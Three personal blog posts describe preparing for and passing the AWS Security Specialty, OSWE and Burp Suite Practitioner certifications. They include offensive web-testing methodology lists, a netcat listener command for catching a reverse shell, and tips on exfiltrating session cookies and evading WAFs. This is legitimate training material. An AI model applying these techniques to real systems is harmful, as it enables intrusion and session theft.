I felt pretty confident this time (it’s justified this time). I realized how much I didn’t know  after this go around and how I maybe didn’t deserve the 700 the first time. I definitely was gunning for a perfect exam . And I forgot to mention when you pass any AWS cert you get 50% off the next, so me failing the first one totally screwed up the financial efficiency I had to pay full price for this one. I PASSED. But did you get the perfect score I definitely didn’t feel like there was ANY question I didn’t know the answer for. Here’s what I woke up to the next day

God knew not to give me a perfect score! Probably would have done more harm than good I was very proud of my score. I ASSAULTED/CRUSHED/ANNIHILATED THAT EXAM. TEACH YOU WHO YOU DEALING WITH This is how I was feeling at the moment!

via GIPHY

---

Amazon AWS Certified Security SCS C01

I needed a break so I took a weekend off. Come Monday I was right back in the grind I wished Stephane had created a course for the Security Specialty but he didn’t I went through Linux Academy course. After that, I brought John Bonso course at tutorialsdojo.

Listen. LISTEN. LISTEN  The length of these questions are in-freaking-sane. I remember one night losing track of time, completing only like 20 questions but over 2 hours had elapsed. It quickly negged me out. I love reading but my gosh these were monsters and the scenarios were ridiculous. I was like bump this I’m not sure I really even want this thing that bad.

via GIPHY

I took like 2 weeks off and came back to it! I wondered if I forgot all the things I had learned from the course, I hadn’t. Mentally I needed to prepare myself for those questions. Ultimately it’s discipline, will, and patience. Eliminated all distractions once again – nobody can get a hold of me and every ounce of free time is devoted to the task at hand. After completing all the questions there I used my free AWS practice exam. It stinks because they don’t even give you the answers. Like WTF is that about? I found any practice questions I could on on the internet for 3 days straight.

Date: Monday 06/26/2020 – 0800 hrs

Now my birthday is 7/8 so I was going to schedule the exam for 7/7 to wake up to the pass on my birthday. I quickly decided not to do that in case i failed so I scheduled it 4 days out on Monday 6/29.

Told you guys I don’t like studying for long. Later on that day at about 1400 hrs I don’t know why but I went back to the exam scheduling and saw they had a exam slot for the same day at 1545 hrs Forget it! I rescheduled it and confirmed it. As soon as I did that I thought, “why the hell did you do that”?

If it was one thing I knew it was this. I was going to be even more disappointed than I was when I came up short for Solutions Architect for the first time. I imagine it would have been something like this after failing.

via GIPHY

Exam was TOUGH. No other way to put it and guess what? Every single question was a monster just like the Bonso questions. 2 paragraphs minimal sometimes like four, tough scenario involving 3-4 services and baking security into it. All the choices are basically the same and differ slightly by the last 2 or 3 words. By the end you’ll be able to read 2-3 choices at the same time, scanning for the differences and then selecting your answer based on that.

All my exams were taken remotely and one thing I think could have pushed me over the bridge for Solutions Architect that’s UNDERRATED is the “Whiteboard” feature on Pearson exams. I used that thing for mostly every question for Security Specialty. Unless you’re a Jedi it’s really tough to have a good understanding of what the monster is asking you without a visualization. You aren’t allowed to use pen and paper. Use the Whiteboard!

Time wise I breezed through Practitioner in ~35 minutes, Solutions Architect ~55 minutes, and this thing #bruh I remember looking up thinking sheesh you’re two hours deep. I had finally finished all 65 questions. Enter second guessing yourself:

I’m not clicking next or ending exam this time! There was maybe 20 questions I was unsure on. You don’t have to be a mathematician to realize 20 wrong answers out of 65 equals a fail. Listen – reviewing your answers when you’re confident is a cursory thing; when you’re not confident it’s like play Russian roulette. I changed about 9 answers total each one filled with a thought, “You’re probably on the borderline right now, you’re going to change an answer that’s correct, make it wrong and that’s going to be your demise”. It’s worth mentioning that only say 50% of the questions are single choice. The others are select the best 2, 3 out of 6,7 selections. The questions are random from a bank like most of the exams so I’m not sure if same will apply to you, but I did notice at least 2 instances where future questions cleared up previous ones. Example

• • Q3   – Which of the following bucket policies allows users from account xyz123 to put resources inside of it?
  • Q17 – Based on the following bucket policy that allows users from account abc456 to put resources inside of it, what of the following accounts wouldn’t be able to access objects?

Flag questions that seem similar so when you review you can easily identify, compare, contrast you may get a bone thrown your way.

Majority of the exam was exactly that reading, understanding policies – IAM, KMS, Bucket policies you better be able to read and understand them as if they were plain English. There was a ton of KMS related things, make SURE you know the nitty gritty like imported key material, all the different type of KMS encryption types when, where, rotation ect.

Clicked next, through the survey and I had PASSED!

---

I think I’ve paid my dues this year guys. I stepped outside of my comfort zone entirely & I’m very proud of that. This year’s timeline looks like the following:

• CISSP 4/9
• Cloud Practitioner 5/9
• Solutions Architect 5/14
• Security Specialty 6/26

Because of Covid-19 this will be the first year since I’ve not been poor (after graduating ~5 years) that I won’t be on an island celebrating. Such is life. I brought myself AWAE as a birthday gift I’m going to dig into that starting July 11.

If you need advice, support or just want to talk I’m always around. Stay safe and definitely stay thirsty (for knowledge).

The post AWS Certification Trifecta appeared first on Certification Chronicles.

Introduction

Once again I am victorious! Being completely transparent, passing that exam was hard – there were periods that totally made me doubt myself. During these times all the blogs you’ve read about people failing multiple time begins to resonate with you. Thoughts such as “who the hell do I think I am to not experience the same” start to creep up. Many people assume since I have a number of certificates that maybe the process is somewhat trivial or that I’m some super smart genius. That is 100% false. It’s a grind, a fight and a constant mental battle. The only difference for me is I have been through so many battles that I can more easily block out the noise, not let it totally consume me and rely on previous successes for confidence. This still takes effort though.

Before we start, there is no way I can provide better information on how to pass the exam than what’s already publicly available. That’s all included in the bookmark section. If you don’t care about the journey feel free to skip to the exam & methodology sections. I never try to give the best because best is subjective, relative and in most aspects I’m still a student. I attempt to provide what I felt was missing from most blogs I read when attempting to study. The context – the thoughts, feelings, emotions and situational metadata most authors never include.  So let’s begin with that.

Mindset

I never pursue certificates for job promotion, advancement or anything besides enhancing my personal knowledge. Therefore it’s never any pressure on me. Besides the kind that’s self injected. It’s all for the love of learning security and its related disciplines. So If you’re the type who brute forces exams and doesn’t really care about the knowledge gain you’re probably not going to like it here. You’ll get (some) technical details sure, but it won’t be an exam dump thanks-goodbye post. That’s not the point. There’s nothing wrong with trying to put yourself in a better position but you should be driven solely by passion. That behavior waters our field down – you’ll meet folks with certificates abc-xyz who can’t think or speak beyond basics. To each’s own.

Why Go After OSWE

What makes a man go after any certificate it seemed like beautiful pain. I hope no one has forgotten that I obtained CISSP at the beginning of the year, Certified Cloud Practitioner, Certified Solutions Architect, and Security Specialty AWS certificates towards beginning of the summer. I didn’t plan on any of this I just identify areas where I’m weak and find the best certificates to try to bridge the gap. I couldn’t take it anymore in June, after aimlessly doing nothing for a whole week. I justified purchasing a new course as a birthday gift to myself how pitiful I know.

I don’t perform any exploit development, penetration testing or malware reversing for work (90% of this blog). I learn them for fun and to understand the more difficult domains of security. Work is mainly Application Security – so this was one of the rare times I found a certificate that actually aligned directly with what I do day-to-day. That’s not to say that those topics don’t contribute to me having a more intimate comprehensive understanding of security because they do.

I knew the course was mainly source-code review. I thought this was AWESOME since there’s not many white-box based courses vs.  1-million black-box counterparts. I figured because of this a large majority of folks would wash this course and certificate down the drain. Folks want to use their tools and get root If you’re a security professional and you run from source-code I can’t take you serious. If you can only leverage tools written by others and not develop your own you’re going to severely limit yourself. That’s one thing, maybe more important for web application security professionals – the vulnerabilities occur in the source-code they just manifest themselves in the applications, the exploits that take advantage of the vulnerabilities need to be developed in some source language. The point is we all need to be comfortable and at-home at the source level. We’re more valuable to our teams, developers and the organizations we defend.

Signing Up

You need to register for the course well before you anticipate starting. The slots fill up pretty fast. The same goes for registering for the exam. I registered on June 29th and the first available lab date was July 11th which I accepted and anxiously awaited. I decided to do 90-days of lab time since I already did the other certificates I planned to slow roll this one and if possible, pass the exam by end of year.

The Lab

If you are not familiar with Offensive Security courses at the exact time your lab is set to begin you’ll receive an email with your VPN credentials, course PDF, and a link to download the videos that go alongside the PDF. Some people are religious about the order in which they prepare whether it’s video first, PDF first. Personally for me I watch the videos for the entire module once and then replicate using the PDF as reference, if needed. Since the videos tend to be more verbose.

Along with the materials, once connected to VPN you get your Control Panel to revert machines. Unique to this course, you’re provided with a WIKI. It contains the list of machines in your lab, their IP addresses and credentials. In addition to that you’re provided with skeleton code for most of the exploits throughout the different modules. Thanks offsec! I would recommend you write it all out by hand and never touch these.

I start the lab and 5 days later guess what? The course gets updated! I get an additional 30 days of lab time for free. Talk about positive vibes!

Prior To Upgrade

The PDF was 267 pages, the videos and included 6 modules.

After The Upgrade

The bulked-up PDF was now 412 pages, included the original 6 modules, 3 additional lab machines with more modern vulnerabilities and exploitation techniques, and  3 machines with no solution purely provided for exam preparation. Of the new 3 lab machines 2 were white-box and 1 was black-box. That’s slightly incredible to receive seemingly 50% more content essentially On the house. I welcomed it with open arms.

Throughout the lab you’ll become one with all sorts of SQLi’s – union-based, time-based, boolean-based, mysql flavor, postgres flavor. Authentication bypasses using session hijacking & session riding will become natural, XXE’s, SSTI’s, deserialization, file upload bypasses and others. You’ll find a variety of languages including Java, PHP, Node.js, Python, C# and Web Frameworks to analyze and get comfortable with. For the compiled languages you’ll learn techniques to recover the original source-code. They’ll drill the importance of database query logging and how to set it up with the many databases throughout the course.

The difference in this course is the perspective and mindset to which you approach finding the vulnerabilities. They’re all impossible to discover purely from a black-box perspective, you won’t be throwing a vulnerability scanner at any of these boxes to find anything, sqlmap will not work (not allowed in exam anyway)! Run nikto, gobuster (or any other kali tool) if you want but it’s useless. You need a healthy combination of brainwork, understanding sources to sinks, routes and controllers. Become comfortable understanding code flow and lots of it. Following the lab guide and videos there are still modules that take multiple days to grasp and over a week to replicate. It’s a marathon not a sprint.

Losing Steam and Yolo’ing It

I was super motivated initially (month 1) putting in like 3-4 hours weekdays and 8+ on weekends. Life happens and you naturally start to lose steam. That’s why I typically troll Reddit for Discord groups with others studying for same or similar certificates. Because you’re not always going to be motivated and having others locked-in keeps you accountable and in the game. There will always be folks to bounce ideas off of, rant and cry to. Probably the most special part is just having friend across the globe that love the same thing as you. Once you have enough friends it’ll be impossible to slack because you’ll have friends in all time zones during breakfast, lunch, dinner and while you sleep to exchange knowledge with. Greetz to all my boys in the Discord server mentioned below.

Towards the beginning of October (month 3) I found myself skipping the lab completely for 3-4 days at a time. It was easier to to say whatever. My original exam date was October 30th and I felt like this exam was consuming me way too much and I was in the lab for way too long. I developed my methodology discussed below, rescheduled the exam for a week earlier 10/24 at 10:00 EST.

I had completed the entire lab twice (excluding the 1 black-box machine from the updated materials) I honestly watched the videos 3 times and still didn’t really grasp how I would have been able to achieve such madness start to finish and wrote it off as not needed. The 2nd time through the lab I took detailed notes – what were the high level steps to achieve authentication bypasses, what did I exploit to get RCEs, what was the syntax of the commands I used, what did I screw up on or miss that I should be on the lookout for if I come across similar situation. Lots of times I make snarky comments reminding myself how much of an idiot I am. It helps make things stick.

2 Weeks Before Exam

During the last 2 weeks I decided to give the 3 boxes without solutions a shot. It was a fight (struggle) but I managed to get RCE on both maybe in like a week and a half. I can remember going an entire weekend stuck and making no progress on one. Those were hard but it’s a shift in your mindset. You gain this fake confidence in the lab since you can simply look at the PDF & videos and you say to yourself , “I knew that or I would have been able to figure that out”. With no solutions your are on your own and at the mercy of your own brain. Again, like the black-box from the lab the black-box with no solutions was a brain fu*k. I got the authentication bypass but didn’t want to waste my remaining time on a exam for source-code review worrying about wicked black-box exploits. Not sure why they included these – I guess it’s to supplement those who don’t have experience analyzing from black-box perspective since in white-box you tend to leverage both. You see an input field or parameter that looks suspicious, find the method in the source-code responsible for processing that input then follow it to see if it’s sanitized or used in an unsafe way. If those black-box boxes (say that a few times fast) don’t make you sweat – you’re much more 1337 than I am!

Enter The Exam

I have been working on my zin a bunch lately. I spend absolutely zero energy on events I can’t control (weather, politics, someone’s thoughts of me, etc). I spend majority of my energy on things I have full control of (thoughts, discipline, being thankful, positive outlook). Finally there’s things that I don’t control fully but have some control of (certification exams). For these I shift my goal not to passing but giving my absolute max, trying my best and if I come up short I still achieve my goal. This reduces negative emotions like anxiety and regret.

So it is the Friday evening before the exam and I’m pumped. I’m excited to have a chance to perform. I really only judge myself when I’m facing challenging situations. It’s when your back is against the wall that determines your resiliency not when things are rosy. I’m a little nervous for the unknown, the shock factor. My only hope was that when I gained access to the exam that it didn’t feel like I had been studying for a different certification.

Day1 – 04:30 a.m – I get out the bed since my mind has been racing for a half hour already. I watched the lab videos of exercises I thought were relevant. Ensured my notes were organized once more and wrote myself some positive notes in size 50 font bolded. The time was dragging but I used it wisely. My fear at this point is that I’m going to get sleepy during the day since I woke up so early, but so be it.

Day1 – 09:45 a.m – I sign into the proctoring software, verify my credentials, display my workspace, and share my screens. I can’t provide specific details here but after connecting to the exam VPN I was provided 2 web application and their source-code. The Control Panel provided details and instructions on how to access each, the point breakdown and what constituted successful compromise. The proctor has no audio, you’re able to communicate with them via chat and your webcam is on at all times. I had been through the exam guide and proctoring manual maybe 15 times before this moment. You definitely don’t want to have IT issues the day of your exam.

Box-1 Start

Day1 – 10:00 a.m – I’m off to the races. I went to the homepage of the first application to see what type of application it was then directly to the source-code. My brain is firing on all cylinders but there’s a LOT of code. Connect the dots. I got the authentication bypass at 18:53. At this point I’m thinking, “Damn I might fail this based off running out of time”.

Box-1 Authentication Bypass Complete (8hours 53 Minutes)

Did I mention I had PRK eye surgery a week before the exam? It’s like the precursor to LASIK but more stable and permanent. This is significant since folks typically want to know how often you took breaks. I was taking medicated eye drops every 4 hours, rewetting drops every hour, and every half hour I’d have to look away for at least a minute to focus on objects far away so I didn’t hurt the recovery of my eyes. I took one break of 30 minutes to eat in that time to get the first authentication bypass.

Day1 – 10:00p.m – Things are hazy and waking up so early is beating me up right now. I know exactly what I have to do and I’m trying but it just won’t work. I’m making stupid scripting mistakes and wasting time on silly things being tired. I take a small break and promise myself I will go to sleep if I can get the RCE.

Day2 – 12:00a.m – I get the RCE and fulfill my promise. I feel okay now since I think I started with the tougher application and it took me around 14 hours start to finish. Off to sleep.

Box-1 RCE Complete (14 hour 15 minutes)

Box-2 Start

Day2 – 04:00a.m – What is up with me and 4 am but anyway that 4 hours felt marvelous and I felt like a tiger waking up! Very motivated. I put on the tea kettle to make myself some ginger tea, notify the proctor I’m back sit back down and lock back in.

Box-2 Authentication Bypass Complete (29 hours 53 minutes)

Day2 – 2:23p.m – I noticed the authentication bypass for this one in less than a half hour. Noticing it and pwning it are totally distinct things. I got the authentication bypass at 14:23. Yes. Imagine knowing what to do and it taking 9-10 hours. The good thing about the second box was I discovered the RCE while doing reconnaissance for the authentication bypass.

Box-2 RCE Complete (33 hours)

Day2 – 05:00p.m – RCE done! Although I have all the points now I also have a very important upcoming week at work and although I could wait until tomorrow (Monday) after work to write the report my exam time expires at 10am Monday. I take a break, eat dinner and start to write the report.

Writing The Report

Day2 – 7:00p.m – I had been taking screenshots throughout but I noticed how much I didn’t grab when I started to go through the sections of Offensive Security’s exam template. TRUST ME .. TRUST ME you do not want to get lazy on the report after you’ve done the exam because they will fail you without hesitation! There are plenty of horror stories. Myself being a former penetration tester and have gone through a couple Offensive Security certificates before I understand the level of granularity they expect you to provide.

Along with the proofs and screenshots you should include your methodology to achieve compromise along with your attack code. I provided everything, what I was thinking, vulnerable methods, pitfalls, and all the other (relevant) things firing off in your brain during a 48 exam.

Day3 – 12:00a.m – I proofread the report with glossy eyes 4 times, completed the process of uploading the exam reports. After I got the confirmation email I went to bed.

I had to wait an entire 5 days from Sunday night -> Friday to receive my results that I had achieved the OSWE certification

Exam Methodology

Everything I’m about to mention is taught and reiterated throughout the course. What’s the point? During the exam you’ll need to absorb and internalize tons of new information. A methodology is a general approach that you can refer to when you hit a snag.

If you don’t know how to debug you are dead. You cannot pass without understanding how to debug properly. In interpreted languages adding print statements. In compiled languages actually stepping over/in methods examining objects, properties and values. Leverage all the techniques taught throughout the course.

General

• Examine unauthenticated areas of the source-code first
• Leverage Visual Studio Code Remote SSH Extension
  • Understand the launch_json files in Visual Studio Code
• Examine the routes to see all the endpoints. Understand the authorization applied to each
• Review the controllers to understand how user input is handled by the application
• If possible, always enable database query logging
• DnsSpy to decompile .NET, JDGui for Java
• After checking unauthenticated areas, focus on areas of the application that are likely to receive less attention
• Investigate how sanitization of user input is performed. Is it done using a trusted, opensource library, or is a custom solution in place
• When auditing realize which code you can reach regardless of conditionals, loop

Potential Authentication Bypass Techniques

• SQLi
  • Can we create a user account
  • Can we leak hashed passwords, reset tokens an other information to aid in authentication bypass
• Broken Authentication
  • Does authentication depend on private information that we can leak from DB using above
• Regular – Time Based – Boolean Based (examples and templates for each)
• PHP Type Juggling
• Reading Arbitrary Files w/ XXE
• XSS -> CSRF (Session Hijacking or Session Riding)

Potential Remote Command/Code Execution

• Code Injection (Eval – Node.js)
• Deserialization Bugs (Java .Net)
• SSTI
• Unrestricted File Upload

Hail Mary

• User Defined Functions
• 3rd Party Frameworks & Libraries
• APIs
• Client Side Attacks
• Reversing Authentication
• Brute Forcing Tokens
• JSP Web Shells

Useful Bookmarks

All the blogs that I used to study. Shoutout to all the authors! Thank you.

• GitHub – timip/OSWE: OSWE Preparation
• GitHub – wetw0rk/AWAE-PREP
• OSWE Exam review “2020” + Notes & Gifts inside! — Hack The Box :: Forums
• Nodejs RCE and a simple reverse shell
• How to exploit the DotNetNuke Cookie Deserialization – Pentest-Tools.com Blog
• Exploit CVE-2017-16088 – ༼ つ ◕_◕ ༽つ
• us-17-Munoz-Friday-The-13th-JSON-Attacks-wp.pdf
• ManageEngine Applications Manager Deserialization Unauthenticated RCE · Application Security Blog
• GitHub – softwaresecured/secure-code-review-checklist: A starter secure code review checklist
• Mr. Me Blog
• PHP Dangerous function · rinku191/OSWE-prepration Wiki · GitHub
• SQL Injection and Postgres – An adventure to eventual RCE
• My AWAE / OSWE Experience | Dan Helton’s Blog
• Offensive Security Web Expert (OSWE) – Advanced Web Attacks and Exploitation – vesiluoma.com
• Deserialization – HackTricks
• POSTGRESQL CODE EXECUTION: UDF REVISITED | by AFINE | Aug, 2020 | Medium

Discord Server – https://discord.gg/EDsJkzz8tG

AWAE Hindsight

• Offensive Security provides you with everything you need to pass the exam but you will also learn new things during the exam
• I didn’t feel the pain folks were experiencing about latency. I did not touch their Kali instance
• Be ready to be rattled. Things aren’t in the regular places, named differently, paths are different. During the exam do not underestimate how much this can freak you out. Basic Terminal/Powershell System Administration knowledge is your friend – grep, find, writing regular expressions and locating processes
• Writing the POCs takes the most time since you need to script the entire exploit in one shot. Even with a developer background this took the most time. If Python is your language of choice be sure to know requests inside & out and in particular the session object!
• Setup local or remote debugging for each lab machine and script the entire exploitation in one shot. This means in one terminal nc -nvlp <port> and in another python main.py 192.168.1.1  and you receive a shell
• Go through all the modules and where Offensive Security says, “after some time we zeroed in on this class” actually go through the entire result set and try to analyze it as if you didn’t know which class contained the vulnerability. In the course it’s easy to say, “Oh they only had 40 results I would been able to filter through those until it’s time to do that”

Conclusion

As long as I’m more knowledgeable than I was prior to starting the course I had a good time and positive experience. No course is perfect so I don’t knit-pick. Some things exceeded my expectation some didn’t. I would recommend the course since you can’t find any competing courses with the same focus. Thank you Offensive Security.

What’s Next

• Windows Kernel Programming by the awesome Pavel Yosifovich. I purchased this and really liked it but got caught up. I’m going to finish it this time!
  
  

 

• SANs 642 London December 2020 Shoutout to my boss! He kept a SANs voucher for me on ice which I graciously used the day after submitting my OSWE report #whatbreak
  
• I am waiting until the new Offensive Security Exploit Development course comes out early 2021. I’m more interested in that than the PEN-300 they just dropped.

 

The post OSWE Review (AWAE Course) appeared first on Certification Chronicles.

Greetings, everyone! I’m back with the grandest of brooms, ready to sweep away three years’ worth of dust that’s gathered on this aging blog. Over this time, my life has seen significant changes, both personally and professionally. The most remarkable of these changes has been embracing the title of a girl-dad – an experience that has transformed my life in ways I never imagined. As outlandish as some of the rumors may be, I’m here to set the record straight by confirming that the answer to the top three questions people have been asking me is emphatically ‘NO’:   

1. Did I vanish into a cosmic abyss?
2. Did I unearth and capitalize on a zero-day exploit, catapulting me into the elite 1%?
3. Did I amass a fortune in Bitcoin and bask in retirement on the pristine shores of the Cayman Islands?

The purpose of this post is threefold:

1. To share my personal journey through the Burp Suite Practitioner Certification, offering insights into the challenges and victories I encountered along the way.
2. To provide valuable resources and tips that were instrumental in my certification journey, aiding others in their quest to pass the exam on their first attempt.
3. To inspire and encourage fellow cybersecurity enthusiasts to embark on their certification journeys, highlighting the value of accessible labs and the wealth of resources available from trusted authorities in the field.

If you’re already well-prepared, completed the labs, and are seeking last-minute exam tips, feel free to skip ahead.

Unwrapping the Burp Suite Practitioner Certification

The Burp Suite Certified Practitioner (BSCP) certification, presented by PortSwigger, the creators of Burp Suite, marks a significant milestone in one’s web security career. It demonstrates the ability to identify vulnerabilities, bypass defense mechanisms, and exploit them using Burp Suite. While some lab material delves into extreme depth, PortSwigger’s well-structured learning path and excellent course materials make most topics accessible and engaging. A detailed lab breakdown can be found in the appendix here.

Investing Wisely: Navigating the Cost of Certification

The BSCP certification costs just $99, which may surprise some. This affordability challenges our expectations, especially in a world accustomed to $1,500 courses and expiring lab subscriptions. It’s a psychological shift, and while it might seem cheap, remember that you’ll also need a Burp Pro license, mandatory for the exam. Currently priced at $449.

Juggling Parenthood and Certification Preparation

The path to certification requires unwavering consistency and willpower. I personally stopped and started my journey multiple times over two years. Acknowledging my lackluster focus, I decided to reset my lab progress in July and start from scratch. As of October 26, 2023, I’ve solved over 200 labs, covering Apprentice and Practitioner levels. The difference this time? I took notes diligently. A valuable lesson: embrace discipline and take notes alongside your hacking journey.

Cracking the Books: A Deep Dive into the Study Process

I embarked on my journey using Obsidian and Burp, with the ambitious goal of completing an entire topic per day (26 in total). My commitment was to ensure that I never went a day without at least completing some labs or reading material. The key to my success was not overlooking foundational topics. I’ve learned that reinforcing the basics keeps me receptive and offers fresh perspectives.

Decoding the Essentials: A Closer Look at Course Topics

Portswigger’s materials stands at the top tier when it comes to web application vulnerability resources. It’s free, which is a game-changer. No more scouring the internet and deploying vulnerable apps with no guidance. The labs are a gift, especially if you’ve experienced the frustration of unresolved vulnerabilities and endless PHP exceptions. While some topics may be challenging at first, the satisfaction of grasping something new is unmatched.

Navigating Your Web Application Security Certification Choices

When it comes to web application security certifications, choosing the right path can be a daunting task. The decision should be based on your existing knowledge, career goals, and the level of expertise you wish to achieve. Remember, there’s no one-size-fits-all choice in this journey.

OSWA (Offensive Security Web Application):

• OSWA claims the top spot due to its foundational and accessible nature, making it an ideal starting point for beginners. This certification provides an essential understanding of web application security, laying a solid groundwork for more advanced certifications. It’s perfect for those new to the field and seeking to build a strong knowledge base.

BSCP (Burp Suite Certified Practitioner):

• BSCP earns the second place in the ranking for its specific focus on Burp Suite, the most popular web vulnerability scanner and security tool. This certification is valuable for individuals looking to master Burp Suite and enhance their web security assessment skills. It’s a practical choice for those who wish to specialize in this tool and its applications.

eWPTX (eLearnSecurity Web Application Penetration Tester eXtreme):

• eWPTX secures the third position, offering a comprehensive and in-depth exploration of web application penetration testing. It’s an excellent choice for web security professionals looking to elevate their expertise and gain advanced skills in this domain. eWPTX provides hands-on experience and practical scenarios, making it a valuable certification for those aiming to take their career to the next level.

OSWE (Offensive Security Web Expert):

• OSWE occupies the fourth rank, signifying its advanced and specialized focus on web application security. This certification is tailored for professionals seeking mastery in advanced web security assessment techniques and defense mechanisms. It’s ideal for those who have already built a strong foundation in web application security and are prepared for the challenges of in-depth expertise in the field.

The Path to Success: Navigating the Exam Journey

To register for the exam, you must complete at least one Practitioner-level lab from each topic, five mystery labs, and one practice exam. Mystery labs challenge you to identify vulnerabilities without explicit objectives. During the exam, you’ll need to compromise two applications within a four-hour window, moving from an anonymous user to an administrative user, and eventually gaining Remote Code Execution (RCE) to retrieve a secret file. The logistics are straightforward, but be prepared to start the exam from a Windows machine, even though you can complete it on your Kali box. You can read the official instructions here.

Acing the Exam: Strategies for Passing on Your First Attempt

First and foremost, dismiss the notion that you have to fail on your first try. The sentiment of preparing to fail on the first attempt is pervasive but not necessary.

Understanding Exam Dynamics:

• Mastery of the exam dynamics is crucial, as it involves understanding the rules for completing each application, guiding you through discrete steps.
• This knowledge is a significant advantage, allowing you to isolate specific topics for different phases of the exam.
• For instance, you’re unlikely to encounter SQL injection or command injection when attempting to gain initial access; instead, client-side attacks to access a user’s session are more common.
• Credit to @botesjuan who I believe is the original creator of the commonly shared image below
  

Master Client-Side Delivery With The Exploit Server:

• The effective use of the exploit server is paramount to your success. Even if your highly experienced, the bare minimum requirements for the exam often lead to failure.
• Relying solely on one Practitioner lab per topic doesn’t adequately prepare you for the exam’s mechanics.

Weaponize Your Client-Side Payloads

• Avoid regarding your alert as the ultimate solution in the labs; it’s insufficient in the exam. Instead, understand in each instance how you can exfiltrate cookies through your collaborator or  exploit server.
• In many labs, you’ll achieve this using an iFrame, but be prepared for unexpected challenges. For example, some vulnerable pages may have X-Frame options that block iFrames.

Complete All Practitioner Labs:

• Completing all Practitioner-level labs is essential, primarily for the sake of familiarity. The exam follows a similar structure to the labs, making your experience invaluable.
• With enough practice, you’ll develop an intuitive sense and a mental checklist of potential vulnerabilities to look for.

Utilize Common Obfuscation and Encoding Techniques:

• While labs may not require you to bypass web application firewalls (WAFs), the exam certainly does. Don’t underestimate the importance of obfuscation and encoding techniques.
• Falling short in this area during the exam can lead to pitfalls, so be well-prepared.

Compile Proof-of-Concept (POC) Code:

• It’s a recipe for disaster to rely solely on grabbing solutions from the lab materials during the exam, especially when you have only 40 minutes per vulnerability.
• Ensure you have POC code readily available for each potential vulnerability you may encounter.

Perform Targeted Scanning, Don’t Rely On It

• While targeted scanning is a valuable skill, it’s unwise to solely depend on it to solve the exam. The ability to actively scan the webroot and resolve the exam isn’t guaranteed.
• Consider learning targeted scanning as an additional tool in your toolkit; it may prove useful in certain scenarios.

Value PortSwigger’s Hints:

• Don’t overlook the hints provided by PortSwigger themselves. These hints can provide critical guidance and insights, potentially making your exam experience smoother and more successful.

Rich Resources: Your Ultimate Toolkit

A big shout-out to the authors of the following content, which proved immensely valuable during my journey. If you aim to pass the exam on your first attempt, bookmark these resources and know them inside and out.

Unlocking Wisdom: Blogs for your Journey

1. https://github.com/botesjuan/Burp-Suite-Certified-Practitioner-Exam-Study
2. https://github.com/DingyShark/BurpSuiteCertifiedPractitioner
3. https://github.com/Zoltan3422/portswigger-guide
4. https://micahvandeusen.com/burp-suite-certified-practitioner-exam-review/
5. https://bscpcheatsheet.gitbook.io/exam/
6. https://www.secjuice.com/bypass-xss-filters-using-javascript-global-variables/
7. https://sc.scomurr.com/http-request-smuggling-web-cache-poisoning/

YouTube Guides: Navigating the World of Burp Suite

1. https://www.youtube.com/@RanaKhalil101/videos
2. https://www.youtube.com/@intigriti/videos
3. https://www.youtube.com/watch?v=yC0F05oggTE
4. https://www.youtube.com/@z3nsh3ll

Burp Plugin Power: Enhancing Your Toolkit:

1. DOM Invader
2. Param Miner
3. Hackvector
4. Deserialization Scanner
5. HTTP Request Smuggler

The Final Verdict on the Burp Suite Practitioner Certification

Through this incredible journey, I’ve ventured into unfamiliar territories while strengthening my knowledge in familiar ones. The accessible labs have proven invaluable, offering a wealth of resources to all, even those who might not be interested in certification.

I want to underscore that if I can persevere through this certification journey with a newborn by my side, anyone with the motivation, focus, and determination can do it too. This certification offers a path to expertise in web security, a field where knowledge is power. So, dive in, make use of the resources I’ve shared, and indulge in your favorite topics. The journey is challenging, but the destination is worth every effort. Until next time, stay inspired and stay secure.

Appendix

My Favorite Topics

• Prototype Pollution
• HTTP Request Smuggling
• Race Conditions

Lab Breakdown

Topic	Total Apprentice Labs	Total Practitioner Labs	Total Expert Labs
SQLi	2	16	0
XSS	9	15	6
CSRF	1	11	0
Clickjacking	3	2	0
DOM-Based	0	5	2
CORS	2	1	1
XXE	2	5	1
SSRF	2	3	2
Request Smuggling	0	15	7
Command Injection	1	4	0
SSTI	0	5	2
Path Traversal	1	5	0
Access Control	9	4	0
Authentication	3	9	2
WebSockets	1	2	0
Cache Poisoning	0	9	4
Deserialization	1	5	3
Info Disclosure	4	1	0
Business Logic	4	7	0
Host Header	2	4	1
OAuth	1	4	1
File Upload	2	4	1
JWT	2	4	2
Prototype Pollution	0	9	1
GraphQL	1	4	0
Race Conditions	1	4	1
NoSQL	2	2	0

The post Mastering Burp Suite: A Journey to Certification and Beyond appeared first on Certification Chronicles.